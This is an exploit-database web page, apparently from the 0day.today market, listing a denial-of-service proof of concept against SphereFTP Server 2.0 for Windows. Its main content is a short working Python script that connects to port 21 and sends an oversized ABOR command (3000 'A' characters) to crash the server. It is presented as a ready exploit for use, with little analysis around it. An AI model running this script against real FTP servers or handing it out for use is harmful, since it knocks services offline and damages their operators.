[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SphereFTP 2.0 Denial Of Service Exploit

Author
Sachin Wagh
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-32459
Category
dos / poc
Date add
01-04-2019
Platform
windows
#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit

import socket
import sys

evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))

s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close

#  0day.today [2024-12-25]  #